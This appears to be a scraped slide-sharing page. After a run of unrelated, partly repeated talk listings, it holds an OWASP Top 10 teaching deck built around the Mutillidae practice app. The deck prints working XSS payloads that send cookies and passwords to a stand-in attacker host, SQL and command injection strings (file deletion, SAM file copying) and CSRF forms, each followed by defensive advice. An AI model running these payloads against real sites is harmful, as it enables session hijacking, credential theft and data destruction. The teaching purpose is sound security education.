The document discusses various web application vulnerabilities from the OWASP Top 10 list, including cross-site scripting (XSS), SQL injection, remote file inclusion, insecure direct object references, and cross-site request forgery (CSRF). It provides examples of each vulnerability type and recommendations for prevention. It also introduces Mutillidae, a deliberately vulnerable web application that can be used to demonstrate these vulnerabilities in a controlled environment.
Les slides de ma présentation à Devoxx France 2017.
Introduite en Java 8, l'API Collector vit dans l'ombre de l'API Stream, ce qui est logique puisqu'un collecteur doit se connecter à un stream pour fonctionner. Le JDK est organisé de sorte que l'on utilise surtout les collectors sur étagère : groupingBy, counting et quelques autres. Ces deux éléments masquent non seulement le modèle de traitement de données des collectors, mais aussi sa puissance et ses performances.
Ces présentation parle des collectors qui existent et qu'il faut connaître, ceux que l'on peut créer, ceux dont on se doute que l'on peut les créer une fois que l'on comprend un peu les choses, et les autres, tant les possibilités offertes par cette API sont illimitées.
Les slides de ma présentation à Devoxx France 2017.
Introduite en Java 8, l'API Collector vit dans l'ombre de l'API Stream, ce qui est logique puisqu'un collecteur doit se connecter à un stream pour fonctionner. Le JDK est organisé de sorte que l'on utilise surtout les collectors sur étagère : groupingBy, counting et quelques autres. Ces deux éléments masquent non seulement le modèle de traitement de données des collectors, mais aussi sa puissance et ses performances.
Ces présentation parle des collectors qui existent et qu'il faut connaître, ceux que l'on peut créer, ceux dont on se doute que l'on peut les créer une fois que l'on comprend un peu les choses, et les autres, tant les possibilités offertes par cette API sont illimitées.
In today's high technology environment, organizations are becoming more and more dependent on their information systems. The public is increasingly concerned about the proper use of data and information. Most Organizations like banks, airlines, markets, manufactures and universities widely used computer systems to manage, manipulate and process their information. Many of today's most widely used computer systems are database applications, for example, Amazon, which was built on top of MySQL. Database application is involved like everywhere in our world, it touches all aspects of our lives.
A database application is a computer program whose primary purpose is entering and retrieving information from a computerized database. Early examples of database applications were accounting systems and airline reservations systems.
The aim of this course is to explore fundamentals of database application related to MySQL, phpMyAdmin, MySQL command lines, apache server and PHP Maker. It details the relational database principles. It shows how to build and develop database application with web interface.
Upon completion of this course, computer students will have gained knowledge of database application concepts and the ability to:
Must know the basic concepts related relational database application.
Must know how to manage relational database via using MySQL command line and phpMyAdmin.
Must know how to build database application with web interface by using MySQL and PHPMaker.
A combination of lectures and practical sessions will be used in this course in order to achieve the aim of the course.
By MSc. Karwan Mustafa Kareem
I did this presentation for one of my java user groups at work.
Basically, this is a mashed up version of various presentations, slides and images that I gathered over the internet.
I've quoted the sources in the end. Feel free to reuse it as you like.
Cryptography for Java Developers: Nakov jProfessionals (Jan 2019)Svetlin Nakov
Cryptography for Java Developers
Hashes, MAC, Key Derivation, Encrypting Passwords, Symmetric Ciphers & AES, Digital Signatures & ECDSA
About the Speaker
What is Cryptography?
Cryptography in Java – APIs and Libraries
Hashes, MAC Codes and Key Derivation (KDF)
Encrypting Passwords: from Plaintext to Argon2
Symmetric Encryption: AES (KDF + Block Modes + IV + MAC)
Digital Signatures, Elliptic Curves, ECDSA, EdDSA
Live demos and code examples: https://github.com/nakov/Java-Cryptography-Examples
Video (in Bulgarian language): https://youtu.be/ZG3BLXWVwJM
Blog: https://nakov.com/blog/2019/01/26/cryptography-for-java-developers-nakov-at-jprofessionals-jan-2019/
In today's high technology environment, organizations are becoming more and more dependent on their information systems. The public is increasingly concerned about the proper use of data and information. Most Organizations like banks, airlines, markets, manufactures and universities widely used computer systems to manage, manipulate and process their information. Many of today's most widely used computer systems are database applications, for example, Amazon, which was built on top of MySQL. Database application is involved like everywhere in our world, it touches all aspects of our lives.
A database application is a computer program whose primary purpose is entering and retrieving information from a computerized database. Early examples of database applications were accounting systems and airline reservations systems.
The aim of this course is to explore fundamentals of database application related to MySQL, phpMyAdmin, MySQL command lines, apache server and PHP Maker. It details the relational database principles. It shows how to build and develop database application with web interface.
Upon completion of this course, computer students will have gained knowledge of database application concepts and the ability to:
Must know the basic concepts related relational database application.
Must know how to manage relational database via using MySQL command line and phpMyAdmin.
Must know how to build database application with web interface by using MySQL and PHPMaker.
A combination of lectures and practical sessions will be used in this course in order to achieve the aim of the course.
By MSc. Karwan Mustafa Kareem
I did this presentation for one of my java user groups at work.
Basically, this is a mashed up version of various presentations, slides and images that I gathered over the internet.
I've quoted the sources in the end. Feel free to reuse it as you like.
Cryptography for Java Developers: Nakov jProfessionals (Jan 2019)Svetlin Nakov
Cryptography for Java Developers
Hashes, MAC, Key Derivation, Encrypting Passwords, Symmetric Ciphers & AES, Digital Signatures & ECDSA
About the Speaker
What is Cryptography?
Cryptography in Java – APIs and Libraries
Hashes, MAC Codes and Key Derivation (KDF)
Encrypting Passwords: from Plaintext to Argon2
Symmetric Encryption: AES (KDF + Block Modes + IV + MAC)
Digital Signatures, Elliptic Curves, ECDSA, EdDSA
Live demos and code examples: https://github.com/nakov/Java-Cryptography-Examples
Video (in Bulgarian language): https://youtu.be/ZG3BLXWVwJM
Blog: https://nakov.com/blog/2019/01/26/cryptography-for-java-developers-nakov-at-jprofessionals-jan-2019/
video demos: http://whitehatsec.com/home/assets/videos/Top10WebHacks_Webinar031711.zip
Many notable and new Web hacking techniques were revealed in 2010. During this presentation, Jeremiah Grossman will describe the technical details of the top hacks from 2010, as well as some of the prevalent security issues emerging in 2011. Attendees will be treated to a step-by-step guided tour of the newest threats targeting today's corporate websites and enterprise users.
The top attacks in 2010 include:
• 'Padding Oracle' Crypto Attack
• Evercookie
• Hacking Auto-Complete
• Attacking HTTPS with Cache Injection
• Bypassing CSRF protections with ClickJacking and HTTP Parameter Pollution
• Universal XSS in IE8
• HTTP POST DoS
• JavaSnoop
• CSS History Hack In Firefox Without JavaScript for Intranet Portscanning
• Java Applet DNS Rebinding
Mr. Grossman will then briefly identify real-world examples of each of these vulnerabilities in action, outlining how the issue occurs, and what preventative measures can be taken. With that knowledge, he will strategize what defensive solutions will have the most impact.
Basic overview, testing, mitigation plan for popular web application vulnerabilities such as: XSS, CSRF, SQLi etc.
Updated "Web Security - Introduction" presentation.
Many notable and new web hacking techniques, discoveries and compromises were uncovered in 2008. During his session, the top 10 vulnerabilities present in 2008, as well as some of the prevalent security issues emerging in 2009. Attendees will virtually be able to walk through the vulnerabilities appearing on today’s corporate websites, learning real-world solutions to today’s web application security issues.
Moderator: Mike Stephenson, SC lab manager, SC Magazine
- Jeremiah Grossman, founder and chief technology officer, WhiteHat Security
JavaScript controls our lives – we use it to zoom in and out of a map, to automatically schedule doctor appointments and toplay online games. But have we ever properly considered thesecurity state of this scripting language? Before dismissing the (in)security posture of JavaScript on the grounds of a client-side problem, consider the impact ofJavaScript vulnerability exploitation to the enterprise: from stealing serverside data to infecting users with malware. Hackers are beginning to recognize this new playground and are quicklyadding JavaScript exploitation tools to their Web attack arsenal.
This is a multi-faceted workshop that explores new concepts in web security. After a solid grounding in well-known exploits like cross-site scripting (XSS) and cross-site request forgeries (CSRF), I'll demonstrate how traditional exploits are being used together and with other technologies like Ajax to launch sophisticated attacks that penetrate firewalls, target users, and spread like worms. I'll then discuss some ideas for the future, such as evaluating trends to identify suspicious activity and understanding human tendencies and behavior to help provide a better, more secure user experience.
Katana Security - Consultoria em Segurança da InformaçãoMagno Logan
Apresentação da Katana Security - Empresa especializada em Consultoria em Segurança da Informação
Oferecemos Serviços, Produtos e Treinamentos especializados na área.
Consulte-nos para mais informações!
www.katanasec.net
OWASP Top 10 2010 para JavaEE (pt-BR)
Versão traduzida e atualizada do OWASP Top 10 2007 for JavaEE
Traduzida por: Magno Logan (OWASP Paraíba Chapter Leader)
Co0L 2011 - Segurança em Sites de Compras Coletivas: Vulnerabilidades, Ataqu...Magno Logan
Co0L 2011 - Segurança em Sites de Compras Coletivas: Vulnerabilidades, Ataques e Contra-medidas
Maio de 2011 em SP
http://garoa.net.br/wiki/O_Outro_Lado
Accelerate your Kubernetes clusters with Varnish CachingThijs Feryn
A presentation about the usage and availability of Varnish on Kubernetes. This talk explores the capabilities of Varnish caching and shows how to use the Varnish Helm chart to deploy it to Kubernetes.
This presentation was delivered at K8SUG Singapore. See https://feryn.eu/presentations/accelerate-your-kubernetes-clusters-with-varnish-caching-k8sug-singapore-28-2024 for more details.
Connector Corner: Automate dynamic content and events by pushing a buttonDianaGray10
Here is something new! In our next Connector Corner webinar, we will demonstrate how you can use a single workflow to:
Create a campaign using Mailchimp with merge tags/fields
Send an interactive Slack channel message (using buttons)
Have the message received by managers and peers along with a test email for review
But there’s more:
In a second workflow supporting the same use case, you’ll see:
Your campaign sent to target colleagues for approval
If the “Approve” button is clicked, a Jira/Zendesk ticket is created for the marketing design team
But—if the “Reject” button is pushed, colleagues will be alerted via Slack message
Join us to learn more about this new, human-in-the-loop capability, brought to you by Integration Service connectors.
And...
Speakers:
Akshay Agnihotri, Product Manager
Charlie Greenberg, Host
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...UiPathCommunity
💥 Speed, accuracy, and scaling – discover the superpowers of GenAI in action with UiPath Document Understanding and Communications Mining™:
See how to accelerate model training and optimize model performance with active learning
Learn about the latest enhancements to out-of-the-box document processing – with little to no training required
Get an exclusive demo of the new family of UiPath LLMs – GenAI models specialized for processing different types of documents and messages
This is a hands-on session specifically designed for automation developers and AI enthusiasts seeking to enhance their knowledge in leveraging the latest intelligent document processing capabilities offered by UiPath.
Speakers:
👨🏫 Andras Palfi, Senior Product Manager, UiPath
👩🏫 Lenka Dulovicova, Product Program Manager, UiPath
JMeter webinar - integration with InfluxDB and GrafanaRTTS
Watch this recorded webinar about real-time monitoring of application performance. See how to integrate Apache JMeter, the open-source leader in performance testing, with InfluxDB, the open-source time-series database, and Grafana, the open-source analytics and visualization application.
In this webinar, we will review the benefits of leveraging InfluxDB and Grafana when executing load tests and demonstrate how these tools are used to visualize performance metrics.
Length: 30 minutes
Session Overview
-------------------------------------------
During this webinar, we will cover the following topics while demonstrating the integrations of JMeter, InfluxDB and Grafana:
- What out-of-the-box solutions are available for real-time monitoring JMeter tests?
- What are the benefits of integrating InfluxDB and Grafana into the load testing stack?
- Which features are provided by Grafana?
- Demonstration of InfluxDB and Grafana using a practice web application
To view the webinar recording, go to:
https://www.rttsweb.com/jmeter-integration-webinar
Neuro-symbolic is not enough, we need neuro-*semantic*Frank van Harmelen
Neuro-symbolic (NeSy) AI is on the rise. However, simply machine learning on just any symbolic structure is not sufficient to really harvest the gains of NeSy. These will only be gained when the symbolic structures have an actual semantics. I give an operational definition of semantics as “predictable inference”.
All of this illustrated with link prediction over knowledge graphs, but the argument is general.
Epistemic Interaction - tuning interfaces to provide information for AI supportAlan Dix
Paper presented at SYNERGY workshop at AVI 2024, Genoa, Italy. 3rd June 2024
https://alandix.com/academic/papers/synergy2024-epistemic/
As machine learning integrates deeper into human-computer interactions, the concept of epistemic interaction emerges, aiming to refine these interactions to enhance system adaptability. This approach encourages minor, intentional adjustments in user behaviour to enrich the data available for system learning. This paper introduces epistemic interaction within the context of human-system communication, illustrating how deliberate interaction design can improve system understanding and adaptation. Through concrete examples, we demonstrate the potential of epistemic interaction to significantly advance human-computer interaction by leveraging intuitive human communication strategies to inform system design and functionality, offering a novel pathway for enriching user-system engagements.
DevOps and Testing slides at DASA ConnectKari Kakkonen
My and Rik Marselis slides at 30.5.2024 DASA Connect conference. We discuss about what is testing, then what is agile testing and finally what is Testing in DevOps. Finally we had lovely workshop with the participants trying to find out different ways to think about quality and testing in different parts of the DevOps infinity loop.
UiPath Test Automation using UiPath Test Suite series, part 3DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 3. In this session, we will cover desktop automation along with UI automation.
Topics covered:
UI automation Introduction,
UI automation Sample
Desktop automation flow
Pradeep Chinnala, Senior Consultant Automation Developer @WonderBotz and UiPath MVP
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualityInflectra
In this insightful webinar, Inflectra explores how artificial intelligence (AI) is transforming software development and testing. Discover how AI-powered tools are revolutionizing every stage of the software development lifecycle (SDLC), from design and prototyping to testing, deployment, and monitoring.
Learn about:
• The Future of Testing: How AI is shifting testing towards verification, analysis, and higher-level skills, while reducing repetitive tasks.
• Test Automation: How AI-powered test case generation, optimization, and self-healing tests are making testing more efficient and effective.
• Visual Testing: Explore the emerging capabilities of AI in visual testing and how it's set to revolutionize UI verification.
• Inflectra's AI Solutions: See demonstrations of Inflectra's cutting-edge AI tools like the ChatGPT plugin and Azure Open AI platform, designed to streamline your testing process.
Whether you're a developer, tester, or QA professional, this webinar will give you valuable insights into how AI is shaping the future of software delivery.
Key Trends Shaping the Future of Infrastructure.pdfCheryl Hung
Keynote at DIGIT West Expo, Glasgow on 29 May 2024.
Cheryl Hung, ochery.com
Sr Director, Infrastructure Ecosystem, Arm.
The key trends across hardware, cloud and open-source; exploring how these areas are likely to mature and develop over the short and long-term, and then considering how organisations can position themselves to adapt and thrive.
2. http://Irongeek.com
I run Irongeek.com
I have an interest in InfoSec
education
I don’t know everything - I’m just a
geek with time on my hands
I’m also not a professional web
developer, creating crappy code
was easy or me.
So why listen to me? Sometimes it
takes a noob to teach a noob.
3. http://Irongeek.com
OWASP Top 10
http://www.owasp.org/index.php/OWASP_Top_Ten_Project
(As a side note, I’ve copied quite of few of their descriptions and fixes into this presentation)
Mutillidae
http://www.irongeek.com/i.php?page=security/mutillidae-
deliberately-vulnerable-php-owasp-top-10
Ok, but what are those?
4. http://Irongeek.com
The 2007 list includes:
A1 - Cross Site Scripting (XSS)
A2 - Injection Flaws
A3 - Malicious File Execution
A4 - Insecure Direct Object Reference
A5 - Cross Site Request Forgery (CSRF)
A6 - Information Leakage and Improper Error Handling
A7 - Broken Authentication and Session Management
A8 - Insecure Cryptographic Storage
A9 - Insecure Communications
A10 - Failure to Restrict URL Access
The OWASP Top Ten represents a broad consensus about what the most critical
web application security flaws are.
5. http://Irongeek.com
A teaching tool for illustrating the OWASP 10
Written in PHP/MySQL
Meant to be simpler than WebGoat
Simple to exploit, just to get the concept across
Easy to reset
Includes a “Tips” function to help the student
7. http://Irongeek.com
XSS flaws occur whenever an
application takes user supplied data and
sends it to a web browser without first
validating or encoding that content. XSS
allows attackers to execute script in the
victim's browser which can hijack user
sessions, deface web sites, possibly
introduce worms, etc.
9. http://Irongeek.com
Simple:
<script>alert("XSS");</script>
Page Redirect:
<script>window.location = "http://www.irongeek.com/"</script>
Cookie Stealing:
<script>
new Image().src="http://attacker.hak/catch.php?cookie="+encodeURI(document.cookie);
</script>
Password Con:
<script>
username=prompt('Please enter your username',' ');
password=prompt('Please enter your password',' ');
document.write("<img
src="http://attacker.hak/catch.php?username="+username+"&password="+password+""
>");
</script>
10. http://Irongeek.com
External Javascript:
<script src="http://ha.ckers.org/xss.js">
</script>
Hot BeEF Injection:
<script language='Javascript'
src='http://localhost/beef/hook/beefmagic.js.php'></script>
How about the User Agent string?
12. http://Irongeek.com
Input validation.
Strong output encoding. htmlspecialchars()
Specify the output encoding.
Do not use "blacklist" validation to detect XSS in
input or to encode output.
Watch out for canonicalization errors.
13. http://Irongeek.com
Injection flaws, particularly SQL
injection, are common in web applications.
Injection occurs when user-supplied data is
sent to an interpreter as part of a command
or query. The attacker's hostile data tricks
the interpreter into executing unintended
commands or changing data.
14. http://Irongeek.com
The Code:
“SELECT * FROM accounts WHERE username='". $username ."' AND
password='".stripslashes($password).”’”
or
echo shell_exec("nslookup " . $targethost);'“
Expected to fill in the string to:
SELECT * FROM accounts WHERE username=‘adrian' AND password=‘somepassword’
or
Nslookup irongeek.com
But what if the person injected:
SELECT * FROM accounts WHERE username=‘adrian' AND password=‘somepassword’ or 1=1 -- ’
or
Nslookup irongeek.com && del *.*
15. http://Irongeek.com
Simple SQL Injection:
' or 1=1 --
Wish I could do this, but can't stack in MySQL/PHP
'; DROP TABLE owasp10; --
Command Injections:
&& dir
&& wmic process list
&& wmic useraccount list
&& copy c:WINDOWSrepairsam && copy
c:WINDOWSrepairsystem.bak
(use ; as a separator if you are running this on Linux)
16. http://Irongeek.com
SQL Injection Cheat Sheet
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
SQL Injection Attacks by Example
http://unixwiz.net/techtips/sql-injection.html
Command line Kung Fu
http://blog.commandlinekungfu.com/
17. http://Irongeek.com
Input validation.
Use strongly typed parameterized query APIs
(bound parameters).
Enforce least privilege.
Avoid detailed error messages.
Show care when using stored procedures.
Do not use dynamic query interfaces.
Do not use simple escaping functions.
Watch out for canonicalization errors.
18. http://Irongeek.com
Code vulnerable to remote file
inclusion (RFI) allows attackers to include
hostile code and data, resulting in
devastating attacks, such as total server
compromise. Malicious file execution
attacks affect PHP, XML and any framework
which accepts filenames or files from users.
19. http://Irongeek.com
Grabbing a local file:
http://target.hak/index.php?page=source-
viewer.php&php_file_name=config.inc
Tamper Data, POST data and an inadvertent proxy
21. http://Irongeek.com
Strongly validate user input using "accept known good" as a strategy
Add firewall rules to prevent web servers making new connections to
external web sites and internal systems.
Consider implementing a chroot jail or other sand box mechanisms.
# PHP: Disable allow_url_fopen and allow_url_include in php.ini and
consider .building PHP locally to not include this functionality.
# PHP: Disable register_globals and use E_STRICT to find uninitialized
variables.
# PHP: Ensure that all file and streams functions (stream_*) are carefully
vetted.
22. http://Irongeek.com
A direct object reference occurs when
a developer exposes a reference to an
internal implementation object, such as a
file, directory, database record, or key, as a
URL or form parameter. Attackers can
manipulate those references to access
other objects without authorization.
24. http://Irongeek.com
Avoid exposing your private object references to
users whenever possible, such as primary keys or
filenames.
Validate any private object references extensively
with an "accept known good" approach.
Verify authorization to all referenced objects.
25. http://Irongeek.com
A CSRF attack forces a logged-on
victim's browser to send a pre-authenticated
request to a vulnerable web application,
which then forces the victim's browser to
perform a hostile action to the benefit of the
attacker. CSRF can be as powerful as the
web application that it attacks.
26. http://Irongeek.com
Target Web App
Client
Website the
attacker controls
1. Session established
with web app via a
cookie. (already logged
in)
2. At some later point,
content that the
attacker controls is
requested.
3. Attacker serves up
content that asks
client’s browser to
make a request.
4. Client makes request,
and since it already has
a session cookie the
request is honored.
27. http://Irongeek.com
Let visit a page with this lovely link:
<img src="http://target.hak/index.php?page=add-to-your-
blog.php&input_from_form=hi%20there%20monkeyboy">
Don’t want to use a bad image? Try an Iframe:
<iframe src="http://target.hak/index.php?page=add-to-your-
blog.php&input_from_form=hi%20there%20monkeyboy"" style="width:0px;
height:0px; border: 0px"></iframe>
Can’t use the GET method? Try something like:
<html> <body>
<form name="csrfform" method="post"
action="http://target.hak/index.php?page=add-to-your-blog.php">
<input type='hidden' name='input_from_form'
value="Test of of auto submitted form.">
</form>
<script>document.csrfform.submit()</script>
</body></html>
28. http://Irongeek.com
CSRF Flaws Found On Major Websites, Including a
Bank
http://it.slashdot.org/article.pl?sid=08/09/30/0136219
CSRF Home Router Fun
http://www.gnucitizen.org/blog/persistent-xss-and-csrf-on-wireless-g-
adsl-gateway-with-speedbooster-wag54gs/
CSRF in Gmail
http://www.gnucitizen.org/blog/google-gmail-e-mail-hijack-technique/
29. http://Irongeek.com
For sensitive data or value transactions, re-authenticate or
use transaction signing to ensure that the request is
genuine.
Do not use GET requests (URLs) for sensitive data or to
perform value transactions. (see next point)
POST alone is insufficient protection.
Consider adding Captchas and extra sessions values as
hidden form elements.
30. http://Irongeek.com
Deliberately Insecure Web Applications For
Learning Web App Security
http://www.irongeek.com/i.php?page=security/deli
berately-insecure-web-applications-for-learning-
web-app-security